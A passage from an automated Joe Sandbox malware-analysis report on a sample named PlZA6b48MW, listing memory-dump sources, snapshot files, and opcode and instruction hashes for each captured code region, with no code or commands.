                                                                            • Instruction Fuzzy Hash: 7641B961B19D5D4FE7A8F7A884BA7B462D2EBAC310F55017AE40DC32E3DD2C6D418741
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a9edbcf6970f82c13960fa2041b40ecc788d2faacc7e176996aff4732eac7c0
                                                                            • Instruction ID: 2870f0027b99182235674298b111481ce75d753bfc9cab5209cd1517fa37a0e3
                                                                            • Opcode Fuzzy Hash: 2a9edbcf6970f82c13960fa2041b40ecc788d2faacc7e176996aff4732eac7c0
                                                                            • Instruction Fuzzy Hash: D5410731E1D95E8FEB78DAA894786B877A1FF50300F1545B9C04ECB1E6CD38BA858B40
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 842db4ee695c435bccf0c6371a7d205ae948d5f7533d75c44e3a99d35812be42
                                                                            • Instruction ID: 47361f82d5496e6de2caa8905f6438c0b83364f58184049631cbe240192bfb53
                                                                            • Opcode Fuzzy Hash: 842db4ee695c435bccf0c6371a7d205ae948d5f7533d75c44e3a99d35812be42
                                                                            • Instruction Fuzzy Hash: BE41823160C9498FDF98EB28C4A5DA9B3E1FBB931571501AED00AC36A2DE34E845CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c8c339ccc35284a51b72115e6201c031451a9f83716459de8d7e3460ceba483
                                                                            • Instruction ID: 329618baf0a47cf67134d7411ebbe4021208d4923e7debc93d6980aea2f6e1d3
                                                                            • Opcode Fuzzy Hash: 4c8c339ccc35284a51b72115e6201c031451a9f83716459de8d7e3460ceba483
                                                                            • Instruction Fuzzy Hash: 4141733160D9498FDF98EB68C4A5DA5B3E1FBB831071501AAE05EC3292DE35ED45CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb9ed2d073ec6f03dfd87b3eb9d1b6a67c9576085193ef2b1ae1b90e7f207b2a
                                                                            • Instruction ID: f2c707f460bf792fc4c0f9b55798e9309c2fd87fa85fd40a8b0e94c647a64435
                                                                            • Opcode Fuzzy Hash: eb9ed2d073ec6f03dfd87b3eb9d1b6a67c9576085193ef2b1ae1b90e7f207b2a
                                                                            • Instruction Fuzzy Hash: 8F310B15B0DA2D1FEB58B77874AAAF977C5DF48325B1440BBE40EC31E7DD18AC428285
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e685b6f9930df4ab29e6cc19c6c281f7c9d63356024dcbae9e1e8ca96493336d
                                                                            • Instruction ID: 8960cba23f51fce77f1e456aae2fdf4e63d4c3c5af7c677b3e6cc94aeedf5422
                                                                            • Opcode Fuzzy Hash: e685b6f9930df4ab29e6cc19c6c281f7c9d63356024dcbae9e1e8ca96493336d
                                                                            • Instruction Fuzzy Hash: F1319E31608D498FDB9CEF28C4A5D68B3E1FBB935171502AED44AC76A2DE34E845CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c58853b73b698a65ae2eb5a10f35cc21944e2ef673310bb59d1171268dcd0e5
                                                                            • Instruction ID: f0dec61274c5e5e9a89be1f983760b76e2cf4c7a79098ca7cf3dc22b4e1bf211
                                                                            • Opcode Fuzzy Hash: 6c58853b73b698a65ae2eb5a10f35cc21944e2ef673310bb59d1171268dcd0e5
                                                                            • Instruction Fuzzy Hash: D531923160C9498FDB9CEF28C4A5E64B3E1FBB831071501AED05EC72A2DE25EC45CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b5ebfd699a08577cc56c4e35e181f1bc3463459525318955d3b7f5d321447958
                                                                            • Instruction ID: 9811d71f0a165788e7e2344f1a35eb7aac03804e446fbd993c1c589089a02758
                                                                            • Opcode Fuzzy Hash: b5ebfd699a08577cc56c4e35e181f1bc3463459525318955d3b7f5d321447958
                                                                            • Instruction Fuzzy Hash: A131FB11B1C92D1EFB58B768746AAB977C5DF58329B1440BBE40EC31E7DD18AC414285
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c0b2e845fc9ad41eab00f33cacbd8c6eec5f169c54dfbde976e9fee68297953
                                                                            • Instruction ID: 849edb602f7512ca07d33e1bc8fcfee976e44a5901f47e3fa42bd44f48e86dcd
                                                                            • Opcode Fuzzy Hash: 6c0b2e845fc9ad41eab00f33cacbd8c6eec5f169c54dfbde976e9fee68297953
                                                                            • Instruction Fuzzy Hash: D2318131608D498FDF9CEF28C4A5DA9B3E1FBB935171501AED04AC76A2DE34E845CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8f53cc7c5cbe76293c3c4c4fe00becb17e2c08779c671d9bcaadd4ece488f8b
                                                                            • Instruction ID: 4b7e17c69c41b4273a557d70b1601a1ea5acb190687d9539f560521d4b00cfe6
                                                                            • Opcode Fuzzy Hash: b8f53cc7c5cbe76293c3c4c4fe00becb17e2c08779c671d9bcaadd4ece488f8b
                                                                            • Instruction Fuzzy Hash: 3D31527160C9498FDB9CEF28C4A5EA5B3E1FBB831071501A9E05EC72A2DE35ED45CB81
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6cce57b1d2af3ca1bd69c37cb40d83212805709fffbea3c9249499d0ce0b828a
                                                                            • Instruction ID: da7b265b72a78a301126da08217d7de078b9f100bfeb07ec594bc505db60722c
                                                                            • Opcode Fuzzy Hash: 6cce57b1d2af3ca1bd69c37cb40d83212805709fffbea3c9249499d0ce0b828a
                                                                            • Instruction Fuzzy Hash: B131A630A0D6999FDF56EBB4C8659A97FF1FF1A310B0505FAD04AD71A2DA38A841C740
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28d24992345567860a792fb868b1dfd4d4ff371a0a993bd1398711ca2db07e3d
                                                                            • Instruction ID: 0f38314908b75a843ade822339802a1e5a10b74a76cfb6e16e72ff48aca23f3f
                                                                            • Opcode Fuzzy Hash: 28d24992345567860a792fb868b1dfd4d4ff371a0a993bd1398711ca2db07e3d
                                                                            • Instruction Fuzzy Hash: D3216521F1D90D4FEFA5E768C46567826D2EF9C710F570175D04ED32B2DD28AE414601
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6266410a2ad4a7a4684efb8ae053f437a713329b9511534baad4fb77fa6f67f1
                                                                            • Instruction ID: beccfe5251b69696b7b413ad99d50b2f5b98102ef7cecd3c3aca7799d85a317a
                                                                            • Opcode Fuzzy Hash: 6266410a2ad4a7a4684efb8ae053f437a713329b9511534baad4fb77fa6f67f1
                                                                            • Instruction Fuzzy Hash: 6C21F220B1991D1FFB98B76C546AB7976C6EB9C315B5100BAE40DC32E7DD28AC418281
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bbec5d5581d7f402b2ff59aa5b337da2b1d4a1b40016b51abef24c0e0b9fed5
                                                                            • Instruction ID: 773ea27a799d1072bb394cc12ff91c5144c3bc13cce20c8d0bef563161fd724d
                                                                            • Opcode Fuzzy Hash: 9bbec5d5581d7f402b2ff59aa5b337da2b1d4a1b40016b51abef24c0e0b9fed5
                                                                            • Instruction Fuzzy Hash: 3A316030F0ED0ECEEB68DBA494A15BD77B1FF94300F61117AF02ED21A0DA396A409791
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: afe137d81816e98d632870dbf8d209881760d391326c61bb0604bd3b3734c65a
                                                                            • Instruction ID: 0192563a17a18f47ceffdc6236f8b48bb9de006ab4cce9e3db74adca6ffefdbf
                                                                            • Opcode Fuzzy Hash: afe137d81816e98d632870dbf8d209881760d391326c61bb0604bd3b3734c65a
                                                                            • Instruction Fuzzy Hash: 0F213736B1E25D8FEB26A7A8AC650DC7F60EF46324F0541F3D058CB1D3D92826468381
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83f5a13ca5aa4e08d115597b6e65e9e99d2d92d39ad5e33411e816eb3cda9324
                                                                            • Instruction ID: e55bd0849b3a09277f30ebbe58792affc3c50775a05f9cdc490afb8207ccb826
                                                                            • Opcode Fuzzy Hash: 83f5a13ca5aa4e08d115597b6e65e9e99d2d92d39ad5e33411e816eb3cda9324
                                                                            • Instruction Fuzzy Hash: 15311830E1ED0ECEEBB8DBA494615BD77B1FF54300F51017AD42EE69A1DB396A009782
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba97f6f916c6be08440847b1d85c9e06b50af3df3258d30eca4f860e9895b0d9
                                                                            • Instruction ID: e558c6f8132322ac9eeff7bfbd66b1cdd5b8c24ef8141c62478e799a976c503e
                                                                            • Opcode Fuzzy Hash: ba97f6f916c6be08440847b1d85c9e06b50af3df3258d30eca4f860e9895b0d9
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddd55d87009186046bb0301cad9b96ee5516376b7bcd16ca8595e1d739dbb84c
                                                                            • Instruction ID: ab53f0c5f3856e27737abb2053491b69da78d9b86c6e1d7dfea17940693429a0
                                                                            • Opcode Fuzzy Hash: ddd55d87009186046bb0301cad9b96ee5516376b7bcd16ca8595e1d739dbb84c
                                                                            • Instruction Fuzzy Hash: 74E01D41F0E78E5BD73606B404715781E919F17744F5606F6D5454D1E3D96839445311
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction ID: f2ba7abffe63c8899a274807f2a40b32c72ce499144457c3fd6ab61ca92fe777
                                                                            • Opcode Fuzzy Hash: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction Fuzzy Hash: 21C04C06F6B61F01FC3677EE9C660ACA9446FDDF10FDB0172D64D500E1AD4D22D60156
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction ID: 1101dc33c6c077c607539071ca5491d8eac998aacc37a07c3eaf30fccf85f39d
                                                                            • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction Fuzzy Hash: EFC08C305118088FCA00FB2DC98480036E0FB0E210BC20090E40DC7170E21ADC80C700
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction ID: ba52895a6d597aa163f16de3376854e74ecc50fff4a24c5bdf24e95157a358a2
                                                                            • Opcode Fuzzy Hash: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction Fuzzy Hash: 04C04C305218098FC954E76EC9899547AA0FB0D205BD610D0E409CB171E65A99548B45
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 47343c8f396439e268f48578affa61f2658bd6f94dcca19a8f33a1801d29b18a
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: C2C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7171D669DDD5C741
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction ID: 629f6461c4b36ca7b861ddef43af156b0c49fbbc3f788ec2fd8e563ae149d728
                                                                            • Opcode Fuzzy Hash: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction Fuzzy Hash: 89D09210B0F96F85F2384BF1407123D59E49F19300F6B0439D09F419E1C9387A016612
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aac819e78332f11c32da112df4029183b8fb8ee1eb76ed6f91aee2867ac452c7
                                                                            • Instruction ID: 73645866e56aa77ef3ddfd917a0e42b77c40c5fe153de3304e384252ed4fc096
                                                                            • Opcode Fuzzy Hash: aac819e78332f11c32da112df4029183b8fb8ee1eb76ed6f91aee2867ac452c7
                                                                            • Instruction Fuzzy Hash: AFC04C00F1D85E56F75AA614C5716BE48979B94798FD50174E01DC72CFCE1D59020287
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: d188b72abd336879bfdc85e350170273d7c2f391426fd2a1b64518fe4c510848
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: 0AB01230D6F70F42DE3C33F10952474F890AF0D204FD202B4D409401A1E86F52D68283
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: a1d3854d250ecc1df90a4f00d585ec1995221288377aea14f0568f1baa4b5fdc
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: 4AB02202E2E00C02EB30ABB088202BE32000F08308F0B80BA800AA3882CE2822020A00
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 6f7ce818445713f7aa0e774c2beeaf29a64f186ae6dabf6f5b6d195629db34c2
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 97B00204D7740E55EC2433F51A5A06479506B4D524FD61570D41D801A5984F16A55592
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: 2893ec6d549d1c5f3345732fc65bc504d818a10e303429f287afa0ea0ac843a5
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: A4B01200D6740F01EC2433FB0C52064B8446B4C600FCA0170D80D50091A84D12950242
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction ID: 83bd5cf3320ad2f3f69481b569bf19b2fc2fea411dbbd217f932dc66fa759c96
                                                                            • Opcode Fuzzy Hash: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction Fuzzy Hash: 03C09B44F0F74757EB3217F005B507D06610F553007570572D506891F3DDBC7E055251
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5[_H
                                                                            • API String ID: 0-3279724263
                                                                            • Opcode ID: d481e3ac328daa1fc262905c76a5bad4ea4923477e62e03584f5b6d94554e6b5
                                                                            • Instruction ID: bacffcd5512e07b4a76097d778ce1dcc301f7b3612b8a153275e67ec36062321
                                                                            • Opcode Fuzzy Hash: d481e3ac328daa1fc262905c76a5bad4ea4923477e62e03584f5b6d94554e6b5
                                                                            • Instruction Fuzzy Hash: 7B912471A19A8D4FE799EB6888757A97BE1FF99310F4000BBD05AD73E6CB782401C711
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: rL_H
                                                                            • API String ID: 0-3705031574
                                                                            • Opcode ID: 74997a95fcde87e7c2fef363ff88e8ee5a5a952e2af5fb68df709a1d66fdb93c
                                                                            • Instruction ID: 36c91304e000df97cde3fcbccdda7c3af2abf0b76e0d36108baed6915aa3b47d
                                                                            • Opcode Fuzzy Hash: 74997a95fcde87e7c2fef363ff88e8ee5a5a952e2af5fb68df709a1d66fdb93c
                                                                            • Instruction Fuzzy Hash: EF5149A1B2EA8E0FDFA9EB68982567977D1FF59740B0501FBD00DC71E7ED28A9018340
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 8052463f6c62f1f2aa4444131b97153b1d330801e2948b6ba4c70409e2f0a69d
                                                                            • Instruction ID: 331c2f98622196e4978c3791f3f18e07efcb69ff91e94c10f4a0c25885855d31
                                                                            • Opcode Fuzzy Hash: 8052463f6c62f1f2aa4444131b97153b1d330801e2948b6ba4c70409e2f0a69d
                                                                            • Instruction Fuzzy Hash: B1516271E1A54E8FDB69DBE8C4A55BCB7B1FF59300F1140BAD01AEB296DA346A01CB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: d26c9152b5c0cc561e36a9e6ed5707217e30225bb42ff6ae51f74b2e79230f9f
                                                                            • Instruction ID: e9c99e5266a5e0683643fc663627c111a27fb6f65ff303d8e961000bef3a908f
                                                                            • Opcode Fuzzy Hash: d26c9152b5c0cc561e36a9e6ed5707217e30225bb42ff6ae51f74b2e79230f9f
                                                                            • Instruction Fuzzy Hash: 14411A70E1964E9FDB59DFA4C4A59BDB7B1FF44300F1140AED01AA72A6CA392A02CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction ID: d9596c3f5642eca637aca59428efd02c59ead47a4caec7d45c71ffe3258c4756
                                                                            • Opcode Fuzzy Hash: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction Fuzzy Hash: 87F0A03060E7C44FC7169A3488294147F60EF6720034A52EFC045CF1A3DA188885C701
                                                                            Strings
                                                                            Memory Dump Source
